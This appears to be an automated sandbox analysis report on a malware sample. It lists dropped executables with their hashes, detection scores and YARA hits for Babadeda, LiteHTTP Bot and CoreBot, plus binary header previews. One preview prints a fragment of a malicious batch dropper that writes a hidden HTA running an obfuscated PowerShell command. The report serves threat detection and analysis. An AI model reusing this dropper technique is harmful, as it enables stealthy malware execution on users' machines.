SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):3243520
Entropy (8bit):6.653095926618001
Encrypted:false
SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
MD5:375CE25C0529862F6EE716A3E001BB0E
SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                                                                                                                                        SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):93696
                                                                                                                                                                                                                        Entropy (8bit):6.742682621521483
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:n7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfEwb3BOp:77DhdC6kzWypvaQ0FxyNTBfEB
                                                                                                                                                                                                                        MD5:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                        SHA1:F19B8F64D6B6538F9E91F0DD5B67EDD39225B811
                                                                                                                                                                                                                        SHA-256:35EA0526EF247A229B7A5FFA6D23928FD25C4BCAAC41A34D7C735CC2A8746822
                                                                                                                                                                                                                        SHA-512:3E3BE988610BE6A6874176145969AD7C0C9E7935774803A62E594BFA4C96B2BAD795E3C77EA6958AA5E38F5B5545CF9629E74D909AA5E00FCA7F78A2013F68EC
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....V...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...b....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......L..............@....rsrc................^..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15360
                                                                                                                                                                                                                        Entropy (8bit):5.03888709426846
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:8dGRmTbW+eO9GXSrtx2MUyQ6JCgf61FDOVV:QzGXaff61FDO7
                                                                                                                                                                                                                        MD5:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                                                                                                                        SHA1:D8046191A1D1756768A8BAD62CE3BA757DEB7D53
                                                                                                                                                                                                                        SHA-256:CC5EB5AC7CB599572A1C9747EFA83774221E0AD4A24ED6545D5BC03A44A23196
                                                                                                                                                                                                                        SHA-512:72F618868C9960332931D7055A4BFF5B3394979A1F5D8089D51C6DC436A121A3D9332D405A3EB3F65FCB8C5930C73606E194782FCF29B46D5E42235DE29ACC33
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..2...........P... ...`....@.. ....................................`..................................O..O....`..............................(O..8............................................ ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................O......H........-..`!...........................................................0..8.......s......(....}......}......}.....|......(...+.|....(....*.0...........(......s...... ...o.....+..*...0..\........s.......o......(....o....o....o .....r...po!......("...&...&.r...prm..p...(#...&....($....*......1..<.......0..1.......s......(....}......}.....|......(...+.|....(....*....0..V...........(.....ry..p.(%......(&...&r...p.r...p('...((..........r...p.o)...(*...((.........*.........."8..
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1787
                                                                                                                                                                                                                        Entropy (8bit):5.366940737845822
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:SfNaoQdXTEQdWfNaoQ0QPfNaoQBQTfNaoQqd+0UrU0U8Qqw:6NnQdTEQ4NnQ0QnNnQBQLNnQN0UrU0U5
                                                                                                                                                                                                                        MD5:2A9A8BA89AB36648791D41814C39B210
                                                                                                                                                                                                                        SHA1:1CCE340BBBF327AE7B53F91A197BC24A29800E19
                                                                                                                                                                                                                        SHA-256:4F2062B96868665126365FF20C7528C705667F27AF08BF759C1288B4E28076F4
                                                                                                                                                                                                                        SHA-512:104693949FD75E98A1BC60BC7041421B31FA515FB963042C57EA98F6CF2487996D07686D8085B17C9896CA908B36EA10FAEF0D6A58F4107AB25959EA8998190C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/6FB31D3CACE220E185FF385B15D22302",.. "id": "6FB31D3CACE220E185FF385B15D22302",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/6FB31D3CACE220E185FF385B15D22302"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/4244B4C0EF868DD963BA3D32FDAFC48A",.. "id": "4244B4C0EF868DD963BA3D32FDAFC48A",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/4244B4C0EF868DD963BA3D32FDAFC48A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):950272
                                                                                                                                                                                                                        Entropy (8bit):7.942316948794619
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:ED6ntLbuapyHDc1yc+Y0e2mX8T+5sQaw/oB:y6ntfLyRcR2+O+5sQasi
                                                                                                                                                                                                                        MD5:A8A4FE132737FED447D14E0247165ED7
                                                                                                                                                                                                                        SHA1:8AF15183B075BD12A070F78B1125516D79646A60
                                                                                                                                                                                                                        SHA-256:246A588619CBCBFD836FC1BF1815252455482FB51B49790424EA638BFD459AA8
                                                                                                                                                                                                                        SHA-512:6EAEDAF06B231A84EA08E786B8C707E07011FB9060147CE01DBADA5BAE95C62CC54DB965CC7FEFC83592381F7DDE494EFCA6C78D3C897835A9964C2A1581D6A2
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................I...........@.................................Y@..m....0.......................A...................................................................................... . . .......`..................@....rsrc........0.......p..............@....idata .....@.......r..............@... .P*..P.......t..............@...cywnalex....../......v..............@...reoqekwb......I......`..............@....taggant.0....I.."...d..............@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50265898
                                                                                                                                                                                                                        Entropy (8bit):7.999674698414995
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:786432:iVfnIqg/4eDeagYxzk6IdjqnDlK4Z6cZKXV1PGQYAka8UGBBFi17KhVX2lfw0PaU:iVTg/44gYxzPIxeDlEcZeVMa8U6Bhxm1
                                                                                                                                                                                                                        MD5:26F7294CA7A10C65B44057525A233636
                                                                                                                                                                                                                        SHA1:59A5C0438745C24350DFF1D05726D85B2F5DB394
                                                                                                                                                                                                                        SHA-256:57598406512555F6B7EC169D6627E77C8581795844CF26D3F61A3E9FB777F36A
                                                                                                                                                                                                                        SHA-512:C73B7161A925D8438F8B31D7E04FB3FEC4DBFCD2A22B52C9C0CC3DA77B6DA3417351C076A28D601D06346B947042EF1715865CA358CB20BBFC7EFCFF9332E440
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."..................|............@..........................@............@.....................................d........]................... .........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc....].......^..................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:@...e...........................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1704448
                                                                                                                                                                                                                        Entropy (8bit):7.939378112820287
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:ACLkDxtWk5WtTj/JuiLWbUT5B+xLNNXTjbT+:RLkDxwk63/JVLqMS1fy
                                                                                                                                                                                                                        MD5:27998D2440B5A856ECA1795EABB8FA23
                                                                                                                                                                                                                        SHA1:62D063990224278662EBD3E54742C09C0ED74751
                                                                                                                                                                                                                        SHA-256:BB98AC0C1EF756EEE54726001008F52B498DD3C8575E190083674F52F33F3D9F
                                                                                                                                                                                                                        SHA-512:814EAB7721F0C0FDE983BF3956094847A1ED79E422AD8A6559A4A4266C9178D996B5341BE6CB20C2E62446001F89222E2D1F7AD7656EB793307AD9087B57A9BD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M...,}..,}..,}..q~..,}..T..,}..,|..,}..qt..,}..q...,}.Rich.,}.........PE..L.....f.................`...........pC......p....@...........................C......>....@.................................a...u................................................................................................................... . .........@..................@....rsrc................P..............@....idata .............R..............@... . )..........T..............@...xuvnqsmj......)......V..............@...dkjxiybl.....`C.....................@....taggant.0...pC.."..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15360
                                                                                                                                                                                                                        Entropy (8bit):5.03888709426846
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:8dGRmTbW+eO9GXSrtx2MUyQ6JCgf61FDOVV:QzGXaff61FDO7
                                                                                                                                                                                                                        MD5:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                                                                                                                        SHA1:D8046191A1D1756768A8BAD62CE3BA757DEB7D53
                                                                                                                                                                                                                        SHA-256:CC5EB5AC7CB599572A1C9747EFA83774221E0AD4A24ED6545D5BC03A44A23196
                                                                                                                                                                                                                        SHA-512:72F618868C9960332931D7055A4BFF5B3394979A1F5D8089D51C6DC436A121A3D9332D405A3EB3F65FCB8C5930C73606E194782FCF29B46D5E42235DE29ACC33
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..2...........P... ...`....@.. ....................................`..................................O..O....`..............................(O..8............................................ ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................O......H........-..`!...........................................................0..8.......s......(....}......}......}.....|......(...+.|....(....*.0...........(......s...... ...o.....+..*...0..\........s.......o......(....o....o....o .....r...po!......("...&...&.r...prm..p...(#...&....($....*......1..<.......0..1.......s......(....}......}.....|......(...+.|....(....*....0..V...........(.....ry..p.(%......(&...&r...p.r...p('...((..........r...p.o)...(*...((.........*.........."8..
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2798
                                                                                                                                                                                                                        Entropy (8bit):5.074542988652506
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:EouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:/u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                        MD5:D04672865C486B6AAD427C322064B30C
                                                                                                                                                                                                                        SHA1:23D3FD4C112365992E7D3E5E2A49B4C247C8A01D
                                                                                                                                                                                                                        SHA-256:BE97D5A0761863C214285693B8CE1938DF0FAD4AD4D2BDAB3667495EBCA2E826
                                                                                                                                                                                                                        SHA-512:28E6C968763EBEE2450ADDDEE9FA2A464C3499F7C9D6DE110C0CAB6F026A038BBA1A467D9842B9CA9FF92B726B760EE2D8758BF4C0B53D52F309A3AFAB7D3D09
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:.@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%64%%65%%6e%
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50265898
                                                                                                                                                                                                                        Entropy (8bit):7.999674698414995
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:786432:iVfnIqg/4eDeagYxzk6IdjqnDlK4Z6cZKXV1PGQYAka8UGBBFi17KhVX2lfw0PaU:iVTg/44gYxzPIxeDlEcZeVMa8U6Bhxm1
                                                                                                                                                                                                                        MD5:26F7294CA7A10C65B44057525A233636
                                                                                                                                                                                                                        SHA1:59A5C0438745C24350DFF1D05726D85B2F5DB394
                                                                                                                                                                                                                        SHA-256:57598406512555F6B7EC169D6627E77C8581795844CF26D3F61A3E9FB777F36A
                                                                                                                                                                                                                        SHA-512:C73B7161A925D8438F8B31D7E04FB3FEC4DBFCD2A22B52C9C0CC3DA77B6DA3417351C076A28D601D06346B947042EF1715865CA358CB20BBFC7EFCFF9332E440
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."..................|............@..........................@............@.....................................d........]................... .........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc....].......^..................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):50688
Entropy (8bit):5.493299313766064
Encrypted:false
SSDEEP:1536:5tVM5LJ25oHc0C+2TkA0fjmExIBbcN3EUrr:5t0J21mj6bcN3EUrr
MD5:18C31E671DEA37E27E89CA09A83B73D5
SHA1:31A7920C83DC371AFEE48098093E5BEDD4017290
SHA-256:2269441328D08D17CBBA18F7AEFE172128700D428AF38D209F3D1FE8D3FCBC3E
SHA-512:C6400F2FBD60B7E2DD8F5ADAF08347DD21487B7DB9B10EAC09AB2A7135789E2D36C3F63BFD117DA773B968EE8AB31226AEFCC944B5F59458760BF76D358CE676
Malicious:true
Yara Hits:
• Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, Author: Joe Security
• Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 26%
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):93696
Entropy (8bit):6.742682621521483
Encrypted:false
SSDEEP:1536:n7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfEwb3BOp:77DhdC6kzWypvaQ0FxyNTBfEB
MD5:C821E7D7DAC978E7D5E8F35B0FE2AF88
SHA1:F19B8F64D6B6538F9E91F0DD5B67EDD39225B811
SHA-256:35EA0526EF247A229B7A5FFA6D23928FD25C4BCAAC41A34D7C735CC2A8746822
SHA-512:3E3BE988610BE6A6874176145969AD7C0C9E7935774803A62E594BFA4C96B2BAD795E3C77EA6958AA5E38F5B5545CF9629E74D909AA5E00FCA7F78A2013F68EC
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\1027024001\am.exe, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 45%
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2013088
Entropy (8bit):6.068687396136205
Encrypted:false
SSDEEP:24576:4U77L3RZgH96z4S/zCtTFL/LcfQnolkbe7yFH3HtDg8VG:4U77L3RZo6/EFPQQny77I3N3VG
MD5:19861D67B2811D6EB3BE1951B28703AE
SHA1:FCE3CDCFC4067AF2451D638E99BB1EDE113C29B8
SHA-256:7B8526752F7A9580FC6EE88C35C8DF39EF69BA1AB4241BBA1FAD1FB44C80A7A5
SHA-512:D13EAC3F7E498217973DC153645FBEFDE3D281B8BE0B4EEC8B1C757948581A5BFA6E4EDF67A73B25AA2AC59895E20A8E94C4573BCAB92244A149405927230890
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):950272
Entropy (8bit):7.942316948794619
Encrypted:false
SSDEEP:24576:ED6ntLbuapyHDc1yc+Y0e2mX8T+5sQaw/oB:y6ntfLyRcR2+O+5sQasi
MD5:A8A4FE132737FED447D14E0247165ED7
SHA1:8AF15183B075BD12A070F78B1125516D79646A60
SHA-256:246A588619CBCBFD836FC1BF1815252455482FB51B49790424EA638BFD459AA8
SHA-512:6EAEDAF06B231A84EA08E786B8C707E07011FB9060147CE01DBADA5BAE95C62CC54DB965CC7FEFC83592381F7DDE494EFCA6C78D3C897835A9964C2A1581D6A2
Malicious:true
Process:C:\Users\user\Desktop\5EfYBe3nch.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3243520
Entropy (8bit):6.653095926618001
Encrypted:false
SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
MD5:375CE25C0529862F6EE716A3E001BB0E
SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
Malicious:true
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3243520
Entropy (8bit):6.653095926618001
Encrypted:false
SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
MD5:375CE25C0529862F6EE716A3E001BB0E
SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
Malicious:true
Process:C:\Users\user\Desktop\5EfYBe3nch.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5163520
Entropy (8bit):5.4946130440701735
Encrypted:false
SSDEEP:49152:HipKOwbwA2wD0syvv+YhXCa67ST5f2jN9/jfHoO5aK:HipKpbwA2wD0syvv+YAamaf2bjPo1K
MD5:8AFA0085DF245EA0BE67A6A4BABA228D
SHA1:2A3975A72E0F1C25996DEA887C05E074D47FEB91
